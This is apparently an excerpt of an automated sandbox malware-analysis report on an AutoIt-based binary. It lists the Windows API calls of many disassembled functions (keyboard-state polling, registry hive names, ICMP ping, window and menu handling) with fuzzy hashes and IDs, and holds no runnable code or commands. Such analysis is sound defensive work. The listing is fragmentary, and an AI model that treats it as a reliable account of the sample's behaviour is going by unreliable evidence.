                                                                                                                                                          • Opcode Fuzzy Hash: 8be082e5b21348aae9b3e2855b39d50efeac1a64b6720382144736e95f40f61b
                                                                                                                                                          • Instruction Fuzzy Hash: EF517571D00119BACF15EBA0ED82EEEB779AF24304F104166F115B21A1EB715FA8DB61
                                                                                                                                                          APIs
                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0016D37F
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0016D3A0
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016D3F3
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D499
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D4B7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                          • API String ID: 2116804098-3420473620
                                                                                                                                                          • Opcode ID: 25cb5ef2e9294afa26e90ec550acadba849c8380a935568a3bb1f2f2cabc5256
                                                                                                                                                          • Instruction ID: d8912880432e1b0a71017758e153b92dcd505f4c3d4bb85cac719ca27e218e41
                                                                                                                                                          • Opcode Fuzzy Hash: 25cb5ef2e9294afa26e90ec550acadba849c8380a935568a3bb1f2f2cabc5256
                                                                                                                                                          • Instruction Fuzzy Hash: 2351A771D00119BACB15FBE0ED82EEEB779AF24700F104066F115B21A1EB756FA8CB61
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182AA6,?,?), ref: 00183B0E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                          • API String ID: 3964851224-909552448
                                                                                                                                                          • Opcode ID: 2629ddb6af216d5c65f9f836a0d942cd5b570b2d14458bcac3cf433fc289c514
                                                                                                                                                          • Instruction ID: a6240aebed332869b19340843db8b9b621faad4506458e9e42e83523a9153b9e
                                                                                                                                                          • Opcode Fuzzy Hash: 2629ddb6af216d5c65f9f836a0d942cd5b570b2d14458bcac3cf433fc289c514
                                                                                                                                                          • Instruction Fuzzy Hash: 51419F3410024A8BDF08FF14E981AEA3765BF25750F18486AFCA26B295DB70DF1ACF50
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0016843F
                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00168455
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00168466
                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00168478
                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00168489
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: SendString$_memmove
                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                          • API String ID: 2279737902-1007645807
                                                                                                                                                          • Opcode ID: 5245b5ea7176d9018a82ff3adb163c7073230deecfedc4cf1f676783222a04b2
                                                                                                                                                          • Instruction ID: 615beb7e577e552d718f5177407e91e502461bf54c745f39d5de9c2b3d6f77c1
                                                                                                                                                          • Opcode Fuzzy Hash: 5245b5ea7176d9018a82ff3adb163c7073230deecfedc4cf1f676783222a04b2
                                                                                                                                                          • Instruction Fuzzy Hash: 7C11E7B1A5016D79D710A7A1EC4AEFF7B7CEBA1B04F00052AB421A21D1EFA04E54C5B1
                                                                                                                                                          APIs
                                                                                                                                                          • timeGetTime.WINMM ref: 0016809C
                                                                                                                                                            • Part of subcall function 0013E3A5: timeGetTime.WINMM(?,75A4B400,00196163), ref: 0013E3A9
                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 001680C8
                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 001680EC
                                                                                                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0016810E
                                                                                                                                                          • SetActiveWindow.USER32 ref: 0016812D
                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0016813B
                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0016815A
                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00168165
                                                                                                                                                          • IsWindow.USER32 ref: 00168171
                                                                                                                                                          • EndDialog.USER32(00000000), ref: 00168182
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                          • Opcode ID: 111ca3ee716016d46dee65826525dc3f99434e2e16931173099bbbd3d6a08a54
                                                                                                                                                          • Instruction ID: 20c2f98465f90dbc39da44629c7feb8cab2fdc28ef8256ba1b5f7119d8b43894
                                                                                                                                                          • Opcode Fuzzy Hash: 111ca3ee716016d46dee65826525dc3f99434e2e16931173099bbbd3d6a08a54
                                                                                                                                                          • Instruction Fuzzy Hash: 562165B1244644BFE7135FA1ECCDA2A3B6AF716348B050214F5268BDA1CF724D959621
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00193C64,00000010,00000000,Bad directive syntax error,001BDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 001632D1
                                                                                                                                                          • LoadStringW.USER32(00000000,?,00193C64,00000010), ref: 001632D8
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • _wprintf.LIBCMT ref: 00163309
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016332B
                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00163395
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                          • API String ID: 1506413516-4153970271
                                                                                                                                                          • Opcode ID: b8a93c2b97689543f162dbec52cf55e60f979f37bc5605b85c5eb6f02ed2fbe7
                                                                                                                                                          • Instruction ID: 4fcd75109c85b3e43524b79ace51dbdf92ddc1f9022dc32da3dc997eac0a3ead
                                                                                                                                                          • Opcode Fuzzy Hash: b8a93c2b97689543f162dbec52cf55e60f979f37bc5605b85c5eb6f02ed2fbe7
                                                                                                                                                          • Instruction Fuzzy Hash: 93215131840219BBDF15EF90DC46EEE7735BF28700F004456F525A11A1EB75AAA8DB61
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3566271842-0
                                                                                                                                                          • Opcode ID: 190a18c82ff2c03f8255aa83c9f2c5090ee0e576d639df411a7cdfde43f19ba8
                                                                                                                                                          • Instruction ID: e57516fd610c8de5f470bff6d35d04eec74fe790b88c2a281196f74adf57dbc2
                                                                                                                                                          • Opcode Fuzzy Hash: 190a18c82ff2c03f8255aa83c9f2c5090ee0e576d639df411a7cdfde43f19ba8
                                                                                                                                                          • Instruction Fuzzy Hash: FF711D75A00229EFDB15EFA4D985ADEB7B8EF49314F048095E919EB261D730EE40CF90
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00163908
                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 00163973
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00163993
                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 001639AA
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 001639D9
                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 001639EA
                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00163A16
                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 00163A24
                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00163A4D
                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 00163A5B
                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00163A84
                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00163A92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                          • Opcode ID: 1edae69362122b8b0f9604407d3f979b51578b593c146699622f13aa9d94070d
                                                                                                                                                          • Instruction ID: 460aaaaaefcf9ac9bf50b7de9c7f0ccfc3d541db0c5f9b95168a7ab368a49bf8
                                                                                                                                                          • Opcode Fuzzy Hash: 1edae69362122b8b0f9604407d3f979b51578b593c146699622f13aa9d94070d
                                                                                                                                                          • Instruction Fuzzy Hash: DE51D820A0878429FB35EBA48C117EABFF49F12384F08859DD5D25B5C3DB549B9CCB62
                                                                                                                                                          APIs
                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0015FB19
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0015FB2B
                                                                                                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0015FB89
                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 0015FB94
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0015FBA6
                                                                                                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0015FBFC
                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0015FC0A
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0015FC1B
                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0015FC5E
                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0015FC6C
                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0015FC89
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0015FC96
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                          • Opcode ID: 240f83cee8e5a6992f049e24f347da2bd3ad24da50fa9b02a8792b01a3f451fa
                                                                                                                                                          • Instruction ID: c67daeeaba43ca492399c7e75f5670e4d04c46562007ef8b7b9e0a6bc377e3cd
                                                                                                                                                          • Opcode Fuzzy Hash: 240f83cee8e5a6992f049e24f347da2bd3ad24da50fa9b02a8792b01a3f451fa
                                                                                                                                                          • Instruction Fuzzy Hash: 06513E71B00609EFDB08CF68DD95AAEBBBAEB89301F14813DB91AD7690D7709D458B10
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0013B067
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                          • Opcode ID: 6b3463fc40a4dee987d2109f2304850ae86fae109e17345e6abca6cf3af5395e
                                                                                                                                                          • Instruction ID: 1263671d9112e910fd3b1d8eb6d22295dc898ddb757bd558349d657a37c12f20
                                                                                                                                                          • Opcode Fuzzy Hash: 6b3463fc40a4dee987d2109f2304850ae86fae109e17345e6abca6cf3af5395e
                                                                                                                                                          • Instruction Fuzzy Hash: AC418331104540AFDB249F28E898BBA37B5AB46731F184265FE768A5E5E7318C81DB21
                                                                                                                                                          APIs
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 136442275-0
                                                                                                                                                          • Opcode ID: 74de352961f0cbfdc28963441ccc7b9dd8ecfc8e5509ba6902222d2624e171ba
                                                                                                                                                          • Instruction ID: d96eaeaba45f441c11ceb12b37833c0f6f870937d5ce2819964e0c75ced86cfa
                                                                                                                                                          • Opcode Fuzzy Hash: 74de352961f0cbfdc28963441ccc7b9dd8ecfc8e5509ba6902222d2624e171ba
                                                                                                                                                          • Instruction Fuzzy Hash: A641FCB290412CAADB25EB50CC55EDE73BCAB58314F5041E6F519A3091EF71ABD8CFA0
                                                                                                                                                          APIs
                                                                                                                                                          • __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                          • __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 00142177: _xtow@16.LIBCMT ref: 00142198
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __itow__swprintf_xtow@16
                                                                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                                                                          • API String ID: 1502193981-2263619337
                                                                                                                                                          • Opcode ID: 09436614d22a2d86e660ed3d9f68c58bf605e6ad1aae30f3f19ae9f4f5818886
                                                                                                                                                          • Instruction ID: 8b44b6dd89993ed66ec794dbcd2ece2537da5acc7574417fb0d9decac17e1bc4
                                                                                                                                                          • Opcode Fuzzy Hash: 09436614d22a2d86e660ed3d9f68c58bf605e6ad1aae30f3f19ae9f4f5818886
                                                                                                                                                          • Instruction Fuzzy Hash: B94126716046159BEB29EF38E841F6A73E6BF58300F20446EE549D7292FB31DA51CB10
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00145CCA
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • __gmtime64_s.LIBCMT ref: 00145D63
                                                                                                                                                          • __gmtime64_s.LIBCMT ref: 00145D99
                                                                                                                                                          • __gmtime64_s.LIBCMT ref: 00145DB6
                                                                                                                                                          • __allrem.LIBCMT ref: 00145E0C
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00145E28
                                                                                                                                                          • __allrem.LIBCMT ref: 00145E3F
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00145E5D
                                                                                                                                                          • __allrem.LIBCMT ref: 00145E74
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00145E92
                                                                                                                                                          • __invoke_watson.LIBCMT ref: 00145F03
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 384356119-0
                                                                                                                                                          • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                          • Instruction ID: 08b74ff5e8c512be34a9baa03f6ad7dd018cb0f35d7273a3b909eb37796b6e42
                                                                                                                                                          • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                          • Instruction Fuzzy Hash: D3710D72A01F16ABD714DF78CC81B6AB3BAAF24764F144139F910EB692E770DE408790
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165816
                                                                                                                                                          • GetMenuItemInfoW.USER32(001E18F0,000000FF,00000000,00000030), ref: 00165877
                                                                                                                                                          • SetMenuItemInfoW.USER32(001E18F0,00000004,00000000,00000030), ref: 001658AD
                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 001658BF
                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00165903
                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0016591F
                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00165949
                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0016598E
                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001659D4
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001659E8
                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00165A09
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4176008265-0
                                                                                                                                                          • Opcode ID: cdd4c3e9d8b003ca79bc0b737507b319eed9fac6d864bfc8a03fba586abf11af
                                                                                                                                                          • Instruction ID: 6861df0e5a456531663ee68736c40cb34297d5a3f50393bdae3569f9be940c90
                                                                                                                                                          • Opcode Fuzzy Hash: cdd4c3e9d8b003ca79bc0b737507b319eed9fac6d864bfc8a03fba586abf11af
                                                                                                                                                          • Instruction Fuzzy Hash: C361C070900A89EFDF21CFA4DC88EBE7BBAEB05358F140159F442A7651D731AD61CB21
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00189AA5
                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00189AA8
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00189ACC
                                                                                                                                                          • _memset.LIBCMT ref: 00189ADD
                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00189AEF
                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00189B67
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$LongWindow_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 830647256-0
                                                                                                                                                          • Opcode ID: 3188a799deb74affacae4f8289edb1d9cb7524537460156e6017b24c0c798f2d
                                                                                                                                                          • Instruction ID: 2b19cdf5fa65caeece76a7f62a665f9bd64faace48285484c045e7896d7aec41
                                                                                                                                                          • Opcode Fuzzy Hash: 3188a799deb74affacae4f8289edb1d9cb7524537460156e6017b24c0c798f2d
                                                                                                                                                          • Instruction Fuzzy Hash: 76615A75A00248AFDB11EFA4DC81EEEB7F8AF09704F140159FA15AB292D770AA45DF50
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00163591
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00163612
                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0016362D
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00163647
                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0016365C
                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00163674
                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 00163686
                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0016369E
                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 001636B0
                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 001636C8
                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 001636DA
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                          • Opcode ID: d0f829be9f722daa5bda6fece1d7995c73b09bfd3535c02793ac2b9082bf3e52
                                                                                                                                                          • Instruction ID: 13ca112fb3a2d766b2ba95c695bb407d365759ea01d09e4b5fc5331491a1941d
                                                                                                                                                          • Opcode Fuzzy Hash: d0f829be9f722daa5bda6fece1d7995c73b09bfd3535c02793ac2b9082bf3e52
                                                                                                                                                          • Instruction Fuzzy Hash: 1D41B260904BC97DFF319B64CC143B5BEA1AB12344F48805DD5D7476C2EBA49BE8CBA2
                                                                                                                                                          APIs
                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0015A2AA
                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 0015A2F5
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0015A307
                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0015A327
                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0015A36A
                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0015A37E
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0015A393
                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0015A3A0
                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0015A3A9
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0015A3BB
                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0015A3C6
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                          • Opcode ID: ff7fdb0d8966cb296755f4ee9994fdbb59e00fe7a6daeb28ea3906efaafe05b8
                                                                                                                                                          • Instruction ID: 71f33b424bf1881a414f34c90d05191e2126c8b142646be2bccefeb16a42fabf
                                                                                                                                                          • Opcode Fuzzy Hash: ff7fdb0d8966cb296755f4ee9994fdbb59e00fe7a6daeb28ea3906efaafe05b8
                                                                                                                                                          • Instruction Fuzzy Hash: 34414171900219EFCB01DFA4DC849DEBFB9FF48315F408065F912A7661DB70AA89CBA1
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • CoInitialize.OLE32 ref: 0017B298
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0017B2A3
                                                                                                                                                          • CoCreateInstance.COMBASE(?,00000000,00000017,001AD8FC,?), ref: 0017B303
                                                                                                                                                          • IIDFromString.COMBASE(?,?), ref: 0017B376
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017B410
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0017B471
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                          • API String ID: 834269672-1287834457
                                                                                                                                                          • Opcode ID: fb8e397f9cfca95a01b1c84770295b848aaa4ed8e7724693f1bbbdfbcf46a296
                                                                                                                                                          • Instruction ID: 33c1dc7b055d2799008dc37ecf9c4d4ad5a14603ab63ab98212604b1b011b3f5
                                                                                                                                                          • Opcode Fuzzy Hash: fb8e397f9cfca95a01b1c84770295b848aaa4ed8e7724693f1bbbdfbcf46a296
                                                                                                                                                          • Instruction Fuzzy Hash: F5618D71208711AFC710DF54D885BAEB7F8BF89714F148419F98A9B292D770ED84CB92
                                                                                                                                                          APIs
                                                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 001786F5
                                                                                                                                                          • inet_addr.WS2_32(?), ref: 0017873A
                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 00178746
                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00178754
                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001787C4
                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001787DA
                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0017884F
                                                                                                                                                          • WSACleanup.WS2_32 ref: 00178855
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                          • String ID: Ping
                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                          • Opcode ID: bad5c75352d3f2a38b448190acd412a9a3eee44c40c55f8188fe0f30dd207da2
                                                                                                                                                          • Instruction ID: a90eecf0cc44b2f54e218b41baab82014a8cb78fb3edd03e5b08c3a20a0ec8f5
                                                                                                                                                          • Opcode Fuzzy Hash: bad5c75352d3f2a38b448190acd412a9a3eee44c40c55f8188fe0f30dd207da2
                                                                                                                                                          • Instruction Fuzzy Hash: D451A131A446009FD714EF64DC89B6ABBF4EF58724F14892AF55ADB2A1DB30EC41CB42
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00189C68
                                                                                                                                                          • CreateMenu.USER32 ref: 00189C83
                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00189C92
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00189D1F
                                                                                                                                                          • IsMenu.USER32(?), ref: 00189D35
                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00189D3F
                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00189D70
                                                                                                                                                          • DrawMenuBar.USER32 ref: 00189D7E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 176399719-4108050209
                                                                                                                                                          • Opcode ID: 4790ae252921daa2823fdaa7e511ad9417dab4b5d96416f61ac208e1869881ba
                                                                                                                                                          • Instruction ID: b119b4eaa1b8f801327f860d223a641cb708fa75e872570f633491ad01f1be88
                                                                                                                                                          • Opcode Fuzzy Hash: 4790ae252921daa2823fdaa7e511ad9417dab4b5d96416f61ac208e1869881ba
                                                                                                                                                          • Instruction Fuzzy Hash: 12413975A00209EFDB10EFA4E884BEA7BF5FF49314F180518E94AAB351D730AA50DF64
                                                                                                                                                          APIs
